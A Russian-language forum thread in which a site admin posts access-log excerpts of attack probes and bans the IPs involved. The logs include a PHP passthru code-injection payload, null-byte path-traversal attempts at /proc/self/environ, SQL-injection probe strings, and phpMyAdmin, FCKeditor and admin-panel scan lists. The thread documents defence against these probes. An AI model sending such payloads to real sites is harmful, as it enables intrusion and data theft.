Попытки взлома сайта

[Admin]

Сегодня при просмотре логов обнаружил следующие обращения к страничкам сайта:

Цитата:05:02:40 18.12 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0 81.252.31.172 /?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}}
05:02:20 18.12 81.252.31.172 /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00
05:02:18 18.12 81.252.31.172 /?mod=../../../../../../proc/self/environ%00
05:02:10 18.12 81.252.31.172 /?page=../../../../../../proc/self/environ%00
05:02:06 18.12 81.252.31.172 /?file=../../../../../../proc/self/environ%00

И чуть позже еще:

Цитата:10:18:23 18.12 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0 217.115.199.40 /?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}}
10:18:14 18.12 217.115.199.40 /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00
10:18:05 18.12 217.115.199.40 /?mod=../../../../../../proc/self/environ%00
10:17:54 18.12 217.115.199.40 /?page=../../../../../../proc/self/environ%00
10:17:47 18.12 217.115.199.40 /?file=../../../../../../proc/self/environ%00

Как я понимаю, это искали уязвимости. Оба IP адреса были забанены.

[Admin]

И еще один чудо хакер

Цитата:06:59:23 21.12 65.82.69.5 /index.php?show=../../../../../../../proc/self/environ%00
06:59:16 21.12 65.82.69.5 /index.php?pg=../../../../../../../proc/self/environ%00
06:59:11 21.12 65.82.69.5 /index.php?page=../../../../../../../proc/self/environ%00
06:59:01 21.12 65.82.69.5 /index.php?inc=../../../../../../../proc/self/environ%00
06:58:56 21.12 65.82.69.5 /index.php?pagina=../../../../../../../proc/self/environ%00
06:58:45 21.12 65.82.69.5 /index.php?visualizar=../../../../../../../proc/self/environ%00
06:58:38 21.12 65.82.69.5 /index.php?open=../../../../../../../proc/self/environ%00
06:58:32 21.12 65.82.69.5 /index.php?x=../../../../../../../proc/self/environ%00
06:58:28 21.12 65.82.69.5 /index.php?include=../../../../../../../proc/self/environ%00

Тоже отправил в бан.

[Admin]

И вот опять наш сайт кому-то покоя не дает.
Опять начались множественные попытки проверок сайта на предмет SQL инъекций. Так же присутствуют попытки обращения к файлам которых нет.

Например:

Цитата:13:59:52 24.03 178.178.44.169 /wp-trackback.php?p=5
16:07:56 24.03 109.10.91.189 /forum/index.php++++++++++++++++++++++++++++Result:+chosen+nickname+"Reejemnatteni";+captcha+recognized;+registered+(registering+only+mode+is+ON);+
21:01:04 24.03 31.184.238.120 /forum/index.php+++++++++++++++++++++++++++++++++++++++++++Result:+%f0%e5%f1%f3%f0%f1+%​e4%eb%ff+%ef%ee%f1%f2%e8%ed%e3%e0+%ed%e5%ef%f0%e8%e3%ee%e4%e5%ed+(%eb%e8%e1%ee+%​ee%f2%f1%f3%f2%f1%f2%e2%f3%e5%f2+%ef%ee%e4%ea%eb%fe%f7%e5%ed%e8%e5+%ea+%e8%ed%f2​%e5%f0%ed%e5%f2%f3)
23:59:00 24.03 69.22.179.124 /hide_links.php'
5:55:26 25.03 193.225.223.51 /phpMyAdmin/scripts/setup.php

17:30:17 26.03 37.9.61.36 /admin/FCKeditor/editor/filemanager/upload/test.html
17:53:31 26.03 37.9.61.36 /fck/editor/filemanager/upload/test.html
18:35:43 26.03 37.9.61.36 /admin/fck/editor/filemanager/upload/test.html
18:49:20 26.03 37.9.61.36 /adm/fckeditor/editor/filemanager/upload/test.html

18:20:08 26.03 80.243.69.95 /bad_bot.php&sa=U&ei=_HpwT6jnNamq0QWTpeiNAg&ved=0CBwQFjAF&usg=AFQjCNF6BkUNQ6nLmdX9q2AgnyxD5pLYfA

И так далее. Некоторые, наиболее надоедливые IP забанил.

[Admin]

Очередной "взломщик" перебирал папки, которых на сайте нет:

Цитата:12:08:39 29.03 31.210.114.52 /phpMyAdmin-2.5.7-pl1/index.php
12:08:34 29.03 31.210.114.52 /phpMyAdmin-2.5.7/index.php
12:08:33 29.03 31.210.114.52 /phpMyAdmin-2.5.6/index.php
12:08:33 29.03 31.210.114.52 /phpMyAdmin-2.5.6-rc2/index.php
12:08:28 29.03 31.210.114.52 /phpMyAdmin-2.5.6-rc1/index.php
12:08:27 29.03 31.210.114.52 /phpMyAdmin-2.5.5-pl1/index.php
12:08:26 29.03 31.210.114.52 /phpMyAdmin-2.5.5/index.php
12:08:21 29.03 31.210.114.52 /phpMyAdmin-2.5.5-rc2/index.php
12:08:20 29.03 31.210.114.52 /phpMyAdmin-2.5.5-rc1/index.php
12:08:20 29.03 31.210.114.52 /phpMyAdmin-2.5.4/index.php
12:08:15 29.03 31.210.114.52 /phpMyAdmin-2.5.1/index.php
12:08:09 29.03 31.210.114.52 /phpMyAdmin-2.2.6/index.php
12:08:09 29.03 31.210.114.52 /phpMyAdmin-2.2.3/index.php
12:08:09 29.03 31.210.114.52 /php-my-admin/index.php
12:08:09 29.03 31.210.114.52 /phpMyAdmin-2/index.php
12:08:03 29.03 31.210.114.52 /phpMyAdmin/index.php
12:07:58 29.03 31.210.114.52 /phpmyadmin/index.php
12:07:52 29.03 31.210.114.52 /websql/index.php
12:07:52 29.03 31.210.114.52 /php-my-admin/index.php
12:07:52 29.03 31.210.114.52 /web/index.php
12:07:51 29.03 31.210.114.52 /xampp/phpmyadmin/index.php
12:07:51 29.03 31.210.114.52 /web/phpMyAdmin/index.php
12:07:51 29.03 31.210.114.52 /pma/index.php
12:07:50 29.03 31.210.114.52 /phpmyadmin2/index.php
12:07:50 29.03 31.210.114.52 /phpmyadmin1/index.php
12:07:50 29.03 31.210.114.52 /phpmyadmin/index.php
12:07:44 29.03 31.210.114.52 /phpMyAdmin/index.php
12:07:39 29.03 31.210.114.52 /phpadmin/index.php
12:07:39 29.03 31.210.114.52 /typo3/phpmyadmin/index.php
12:07:33 29.03 31.210.114.52 /mysqladmin/index.php
12:07:28 29.03 31.210.114.52 /mysql/index.php
12:07:27 29.03 31.210.114.52 /myadmin/index.php
12:07:27 29.03 31.210.114.52 /dbadmin/index.php
12:07:21 29.03 31.210.114.52 /db/index.php
12:07:06 29.03 31.210.114.52 /admin/phpmyadmin/index.php
12:07:05 29.03 31.210.114.52 /admin/pma/index.php
12:07:04 29.03 31.210.114.52 /admin/index.php
12:07:03 29.03 31.210.114.52 /muieblackcat

[Goldmak]

(26.03.2012 18:44:26)Admin писал(а):  И вот опять наш сайт кому-то покоя не дает.
Опять начались множественные попытки проверок сайта на предмет SQL инъекций. Так же присутствуют попытки обращения к файлам которых нет.

Например:

Цитата:13:59:52 24.03 178.178.44.169 /wp-trackback.php?p=5
16:07:56 24.03 109.10.91.189 /forum/index.php++++++++++++++++++++++++++++Result:+chosen+nickname+"Reejemnatteni";+captcha+recognized;+registered+(registering+only+mode+is+ON);+
21:01:04 24.03 31.184.238.120 /forum/index.php+++++++++++++++++++++++++++++++++++++++++++Result:+%f0%e5%f1%f3%f0%f1+%​e4%eb%ff+%ef%ee%f1%f2%e8%ed%e3%e0+%ed%e5%ef%f0%e8%e3%ee%e4%e5%ed+(%eb%e8%e1%ee+%​ee%f2%f1%f3%f2%f1%f2%e2%f3%e5%f2+%ef%ee%e4%ea%eb%fe%f7%e5%ed%e8%e5+%ea+%e8%ed%f2​%e5%f0%ed%e5%f2%f3)
23:59:00 24.03 69.22.179.124 /hide_links.php'
5:55:26 25.03 193.225.223.51 /phpMyAdmin/scripts/setup.php

17:30:17 26.03 37.9.61.36 /admin/FCKeditor/editor/filemanager/upload/test.html
17:53:31 26.03 37.9.61.36 /fck/editor/filemanager/upload/test.html
18:35:43 26.03 37.9.61.36 /admin/fck/editor/filemanager/upload/test.html
18:49:20 26.03 37.9.61.36 /adm/fckeditor/editor/filemanager/upload/test.html

18:20:08 26.03 80.243.69.95 /bad_bot.php&sa=U&ei=_HpwT6jnNamq0QWTpeiNAg&ved=0CBwQFjAF&usg=AFQjCNF6BkUNQ6nLmdX9q2AgnyxD5pLYfA

И так далее. Некоторые, наиболее надоедливые IP забанил.

Уважаемый админ, я очень сильно сомневаюсь, что 37.9.61.36 хакер. Может это робот от гугла или яндекс и т.д. Дело в том, что за 3 дня 04 месяца 12 года, этот ip был на моём сайте 16 раз, лазил по всем файлам и т.д. + лез в админку. При этом, мой сайт никто не знает кроме поисковиков (запустил сайт недавно). Предлагаю нам с Вами поразмыслить над тем, кто это, вдруг и правда это "любитель пошалить"

[Admin]

Все бы ничего, но вот только таких страничек и каталогов на нашем сайте никогда не было:

Цитата:/admin/FCKeditor/editor/filemanager/upload/test.html
/fck/editor/filemanager/upload/test.html
/admin/fck/editor/filemanager/upload/test.html
/adm/fckeditor/editor/filemanager/upload/test.html

Следовательно, нет и ссылок, которые могли бы указывать поисковикам на данные каталоги.
Отсюда можно сделать вывод, что это специально "прощупывают" сайт на предмет наличия данных папок, т.к. в них, скорее всего, имеются файлы с уязвимостями.

[Goldmak]

Похоже, что противник ходит по всем сайтам, и ищет модуль FCKeditor, который, у нас с Вами не установлен. Поэтому может уязвимость именно в этом редакторе?

[Admin]

Вот еще один умелец пытался найти уязвимость в нашем сайте через переменную в строке адреса theme_list. Собственно вот его попытки:

Цитата:15:55:57 09.04 213.85.94.5 /suspicious_ip.php?theme_list=1%09and%09rownum%3Drownum
15:55:55 09.04 213.85.94.5 /suspicious_ip.php?theme_list=1%09and%091%3A%3Aint%3D1
15:55:53 09.04 213.85.94.5 /suspicious_ip.php?theme_list=%2F*%2130000+1*%2F
15:55:52 09.04 213.85.94.5 /suspicious_ip.php?theme_list=1%27
15:55:51 09.04 213.85.94.5 /suspicious_ip.php?theme_list=1%22%09and%09%22x%22%3D%22y
15:55:47 09.04 213.85.94.5 /suspicious_ip.php?theme_list=1%22%09and%09%22x%22%3D%22x
15:55:45 09.04 213.85.94.5 /suspicious_ip.php?theme_list=1%27%09and%09%27x%27%3D%27y
15:55:45 09.04 213.85.94.5 /suspicious_ip.php?theme_list=1%27%09and%09%27x%27%3D%27x
15:55:44 09.04 213.85.94.5 /suspicious_ip.php?theme_list=1%09and%091%3E1
15:55:42 09.04 213.85.94.5 /suspicious_ip.php?theme_list=999999.9
15:55:41 09.04 213.85.94.5 /suspicious_ip.php?theme_list=1
15:55:29 09.04 213.85.94.5 /suspicious_ip.php?theme_list=3-1
15:55:26 09.04 213.85.94.5 /suspicious_ip.php?theme_list=3
15:55:22 09.04 213.85.94.5 /suspicious_ip.php?theme_list=2
15:55:19 09.04 213.85.94.5 /suspicious_ip.php?theme_list=2'
15:55:16 09.04 213.85.94.5 /suspicious_ip.php?theme_list=2

[Admin]

Похоже работают скриптом "прощупывающим" на наличие папок:

Цитата:01:47:01 16.04 123.215.30.134 /phpMyAdmin-2.5.7-pl1/index.php
01:47:00 16.04 123.215.30.134 /phpMyAdmin-2.5.7/index.php
01:46:59 16.04 123.215.30.134 /phpMyAdmin-2.5.6/index.php
01:46:58 16.04 123.215.30.134 /phpMyAdmin-2.5.6-rc2/index.php
01:46:57 16.04 123.215.30.134 /phpMyAdmin-2.5.6-rc1/index.php
01:46:56 16.04 123.215.30.134 /phpMyAdmin-2.5.5-pl1/index.php
01:46:56 16.04 123.215.30.134 /phpMyAdmin-2.5.5/index.php
01:46:55 16.04 123.215.30.134 /phpMyAdmin-2.5.5-rc2/index.php
01:46:54 16.04 123.215.30.134 /phpMyAdmin-2.5.5-rc1/index.php
01:46:53 16.04 123.215.30.134 /phpMyAdmin-2.5.4/index.php
01:46:52 16.04 123.215.30.134 /phpMyAdmin-2.5.1/index.php
01:46:51 16.04 123.215.30.134 /phpMyAdmin-2.2.6/index.php
01:46:50 16.04 123.215.30.134 /phpMyAdmin-2.2.3/index.php
01:46:49 16.04 123.215.30.134 /php-my-admin/index.php
01:46:48 16.04 123.215.30.134 /phpMyAdmin-2/index.php
01:46:48 16.04 123.215.30.134 /phpMyAdmin/index.php
01:46:47 16.04 123.215.30.134 /phpmyadmin/index.php
01:46:46 16.04 123.215.30.134 /websql/index.php
01:46:45 16.04 123.215.30.134 /php-my-admin/index.php
01:46:44 16.04 123.215.30.134 /web/index.php
01:46:43 16.04 123.215.30.134 /xampp/phpmyadmin/index.php
01:46:42 16.04 123.215.30.134 /web/phpMyAdmin/index.php
01:46:41 16.04 123.215.30.134 /pma/index.php
01:46:40 16.04 123.215.30.134 /phpmyadmin2/index.php
01:46:39 16.04 123.215.30.134 /phpmyadmin1/index.php
01:46:39 16.04 123.215.30.134 /phpmyadmin/index.php
01:46:37 16.04 123.215.30.134 /phpMyAdmin/index.php
01:46:37 16.04 123.215.30.134 /phpadmin/index.php
01:46:36 16.04 123.215.30.134 /typo3/phpmyadmin/index.php
01:46:35 16.04 123.215.30.134 /mysqladmin/index.php
01:46:34 16.04 123.215.30.134 /mysql/index.php
01:46:34 16.04 123.215.30.134 /myadmin/index.php
01:46:33 16.04 123.215.30.134 /dbadmin/index.php
01:46:32 16.04 123.215.30.134 /db/index.php
01:46:31 16.04 123.215.30.134 /admin/phpmyadmin/index.php
01:46:30 16.04 123.215.30.134 /admin/pma/index.php
01:46:29 16.04 123.215.30.134 /admin/index.php
01:46:27 16.04 123.215.30.134 /muieblackcat

[Admin]

И еще один искатель админ-панели:

07:11:28 16.04 86.34.3.189 /admin/index.php
07:11:19 16.04 86.34.3.189 /textpattern/
07:11:11 16.04 86.34.3.189 /?q=user
07:11:00 16.04 86.34.3.189 /admin.php
07:10:50 16.04 86.34.3.189 /administrator/index.php
07:10:38 16.04 86.34.3.189 /wp-login.php